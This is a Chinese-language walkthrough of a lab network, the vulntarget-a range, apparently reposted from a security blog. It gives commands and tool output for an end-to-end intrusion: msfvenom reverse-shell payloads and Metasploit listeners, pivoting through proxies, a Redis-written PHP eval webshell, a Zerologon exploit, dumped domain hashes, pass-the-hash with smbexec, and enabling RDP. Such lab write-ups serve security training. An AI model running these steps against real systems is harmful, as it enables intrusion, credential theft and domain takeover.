靶场介绍

vulntarget-a漏洞靶场是由vulntarget大佬团队自己设计搭建的靶场，其中涵盖Web漏洞、主机漏洞、域漏洞、工控漏洞等等。

靶场拓扑

以上拓扑图仅做参考，实战中的地址为以下配置：

kali攻击机：192.168.52.128

win11攻击机：192.168.52.1

win7应用服务器：192.168.52.129，10.0.20.98

win16域成员服务器：10.0.20.99,10.0.10.111

win19域控服务器：10.0.10.110

靶场实战

如需要自己搭建设计可以参考：https://mp.weixin.qq.com/s?__biz=Mzg3NDYwNjQyMw==&mid=2247486312&idx=1&sn=1bd4a6edcd6bc0133215d2fb79abe53b&chksm=cecf7150f9b8f846820c14ff5df467afe67e913b8592715bf7bf76cb011c407df6ead15819d3&scene=21#wechat_redirect

通达漏洞拿下应用服务

思路：主要通过通达OA漏洞拿下应用服务器，也可以通过永恒之蓝漏洞拿到服务器权限，思路差不多
本实战直接采用vulntarget大佬提供的靶场环境。搭建完成服务器后通过扫描win7地址开发端口服务：

服务器开放了80端口，访问后通过判断是通达OA，直接利用工具进行测试

得到shell后直接用蚁剑或者哥斯拉连接

执行命令查看当前网卡，当前为双网卡
ipconfig，如果出现乱码，可以在基本配置中设置编码格式为GB2312

转为CS和MSF上线

为了方便管理会话和后渗透的攻击，建议将会话转移到CS和MSF上

上传CS木马到目标服务器

执行木马，获取cs会话

靶场设计第二层是通过redis上线，利用kali工具进行测试

生成反向木马
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.52.128 LPORT=5555 -f exe > /root/msfshell/5555.exe

使用msf监听

msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > show options 

Payload options (generic/shell_reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port

Exploit target:

Id Name
-- ----
0 Wildcard Target

View the full module info with the info, or info -d command.

msf6 exploit(multi/handler) > set LhOST 192.168.52.128
LhOST => 192.168.52.128
msf6 exploit(multi/handler) > set LPORT
LPORT => 4444
msf6 exploit(multi/handler) > set LPORT 5555
LPORT => 5555
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > show options

Payload options (windows/x64/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.52.128 yes The listen address (an interface may be specified)
LPORT 5555 yes The listen port

Exploit target:

Id Name
-- ----
0 Wildcard Target

View the full module info with the info, or info -d command.

msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.52.128:5555
[*] Sending stage (201798 bytes) to 192.168.52.129
[*] Meterpreter session 1 opened (192.168.52.128:5555 -> 192.168.52.129:51972) at 2024-06-18 16:55:10 +0800

在应用服务器win7上利用哥斯拉执行木马，获取msf会话成功
添加路由，设置代理，arp获取到内网同网段IP

meterpreter > run post/multi/manage/autoroute 

[*] Running module against WIN7-PC
[*] Searching for subnets to autoroute.
[+] Route added to subnet 10.0.20.0/255.255.255.0 from host's routing table.
[+] Route added to subnet 192.168.52.0/255.255.255.0 from host's routing table.
meterpreter > run autoroute -p

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]

Active Routing Table
====================

Subnet Netmask Gateway
------ ------- -------
10.0.20.0 255.255.255.0 Session 20
192.168.52.0 255.255.255.0 Session 20

添加路由成功后，使用socks_proxy开启一个socks代理服务

msf6 auxiliary(server/socks_proxy) > options 

Module options (auxiliary/server/socks_proxy):

Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface
to listen on. This must be an addres
s on the local machine or 0.0.0.0 to
listen on all addresses.
SRVPORT 2222 yes The port to listen on
VERSION 5 yes The SOCKS version to use (Accepted:
4a, 5)

When VERSION is 5:

Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no Proxy password for SOCKS5 listener
USERNAME no Proxy username for SOCKS5 listener

Auxiliary action:

Name Description
---- -----------
Proxy Run a SOCKS proxy server
View the full module info with the info, or info -d command.

msf6 auxiliary(server/socks_proxy) > run
[*] Auxiliary module running as background job 0.

[*] Starting the SOCKS proxy server

开启socks代理后需要使用proxychains4，使用前需要配置一下proxychains4
sudo vim /etc/proxychains4.conf

shell命令中使用arp -a查看除了192.168.52.0/24段的地址

发现10.0.20.99地址，利用nmap扫描10.0.20.99，因为只是常用端口扫描，就没有扫描到6379端口
sudo proxychains4 nmap -sT -Pn 10.0.20.99

可以直接扫描redis端口，扫描的时候需要使用root权限，要不然扫描到的状态是过滤
sudo proxychains4 nmap -sT -p 6379 -Pn 10.0.20.99

利用redis未授权以及php web环境来getshell
redis未授权漏洞写webshell

└─$ sudo proxychains4 redis-cli -h 10.0.20.99                                                                          
[sudo] kali 的密码：
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain  ...  192.168.52.128:2222  ...  10.0.20.99:6379  ...  OK
10.0.20.99:6379> config set dir "C:/phpStudy/PHPTutorial/WWW/"
OK
10.0.20.99:6379> config set dbfilename tx.php
OK
10.0.20.99:6379> set 1 "<?php @eval($_POST['tx']);?>"
OK
10.0.20.99:6379> save
OK
10.0.20.99:6379>

写入shell成功后，利用哥斯拉或者蚁剑连接
利用蚁剑连接，先配置代理

我这边直接尝试反向连接，生成反向木马
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.20.98 LPORT=5555 -f exe -o 123.exe
上传到第二层目标服务器win2016服务上执行
在kali上利用msf监听

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.0.20.98
set LPORT 5555
options

执行后就可以获取msf会话

进入shell后执行ipconfig查看网卡
发现10.0.10.111地址
当前权限是administrator权限

探测域控服务

meterpreter > run post/windows/gather/enum_domain

[+] Domain FQDN: vulntarget.com
[+] Domain NetBIOS Name: VULNTARGET
[+] Domain Controller: win2019.vulntarget.com (IP: 10.0.10.110)

得到域控IP：10.0.10.110

账号：WIN-UKFQSV1OMUB

域：balsec.com

再次添加路由：
run post/multi/manage/autoroute

查看当前路由信息

测试下是否能够扫描域控主机10.0.10.110，利用nmap扫描

直接域内提权

对域控进行测试漏洞是否存在

sudo proxychains4 python3 zerologon_tester.py win2019 10.0.10.110

出现success，证明漏洞存在

直接利用exp进行攻击

使用zerologon工具将域控密码打成空

（这里打空的用户是域控所在机器的账户，并不是域控账户。）

sudo proxychains4 python3 cve-2020-1472-exploit.py win2019 10.0.10.110

获取域控hash，cd到example下：

Administrator:500:aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:839b6abacd6c6bdd814f0ba6fb0f94f9:::
WIN-UKFQSV1OMUB$:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WIN-CHSI558JDRS$:1103:aad3b435b51404eeaad3b435b51404ee:e66191ef715d73ff91be074777d3ed02:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:ecb89a4e91cccc9c7fc032d25baacac6d86068c030f617185a52854eb796c920
Administrator:aes128-cts-hmac-sha1-96:d3b5696e566bca57ffdfd57576068c63
Administrator:des-cbc-md5:322a836da886d39d
krbtgt:aes256-cts-hmac-sha1-96:4d1befebb0d088a69c01f5a4045b3ce78b061d61c273cc7e5f38ca54eec9538d
krbtgt:aes128-cts-hmac-sha1-96:4117fc904715b252b8bed058315068b1
krbtgt:des-cbc-md5:7a45ad015d2cba86
WIN-UKFQSV1OMUB$:aes256-cts-hmac-sha1-96:f03227a5a0d4203943c8e63070692aafbf93f475afc4310dba3350bd4736d59a
WIN-UKFQSV1OMUB$:aes128-cts-hmac-sha1-96:f0f2c8151d89eff91e9d76f412ca54d1
WIN-UKFQSV1OMUB$:des-cbc-md5:f4f8193dc80b4ce0
WIN-CHSI558JDRS$:aes256-cts-hmac-sha1-96:ef70a9041487fef2f7fa4dd91724545ed5286d70242495370b92393de45cb971
WIN-CHSI558JDRS$:aes128-cts-hmac-sha1-96:2157ac92157cde35268a54568a834333
WIN-CHSI558JDRS$:des-cbc-md5:ef8a9449a2b64c37
[*] Cleaning up...

直接就拿下域控
proxychains4 python3 smbexec.py -hashes aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15 [email protected]
开启3389远程桌面

reg add "HKLMSystemCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp" /t REG_DWORD /v portnumber /d 3389 /f

wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1

netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow

直接3389登录：proxychains4 rdesktop 10.0.10.110

账号：balsec.comadministrator 密码：Admin@666

原文始发于微信公众号（小C学安全）：【靶场实战】vulntarget-a漏洞靶场实战